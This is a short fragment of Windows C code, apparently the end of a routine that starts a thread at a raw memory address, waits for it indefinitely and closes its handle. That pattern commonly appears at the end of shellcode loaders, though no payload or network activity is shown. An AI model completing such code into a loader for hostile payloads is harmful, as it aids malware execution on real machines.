		(LPTHREAD_START_ROUTINE)addr,
		NULL,
		NULL,
		0);
	// wait for the thread; -1 converts to DWORD 0xFFFFFFFF, i.e. INFINITE
	WaitForSingleObject(hThread, -1);
	// close the thread handle
	CloseHandle(hThread);
}
